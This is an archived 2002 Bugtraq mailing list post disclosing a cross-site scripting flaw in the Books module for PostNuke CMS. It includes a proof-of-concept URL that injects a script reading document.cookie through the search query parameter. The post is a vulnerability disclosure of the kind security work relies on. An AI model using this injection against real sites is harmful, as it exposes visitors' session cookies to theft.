Bugtraq mailing list archives
The Books Module for the PostNuke CMS XSS Vulnerability
From: Pistone <jorgep () spdps com ar>
Date: Wed, 2 Oct 2002 21:47:08 -0300
- ---------------------------------------------------- Class : input Validation Error Risk : Due to the simplicity of the attack and the number of sites that run module books the risk is classified as Medium to High. URL: Http://pn-mod-books.sourceforge.net - ---------------------------------------------------- This Books module version v0.54 is running as a Mutant (PN 0.64) This Books module version v0.6 is running as a Rogue (PN 0.7) - ---------------------------------------------------- Exploit: http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script| Change | x <> - ------------------------------------------------------- Programmer of Books module receives a copy this report. - -------------------------------------------------------- Salu2 Pistone - - -------- Http://www.gauchohack.com.ar Http://www.hackindex.org
Current thread:
- The Books Module for the PostNuke CMS XSS Vulnerability Pistone (Oct 03)
- Re: The Books Module for the PostNuke CMS XSS Vulnerability Michael Schatz (Oct 11)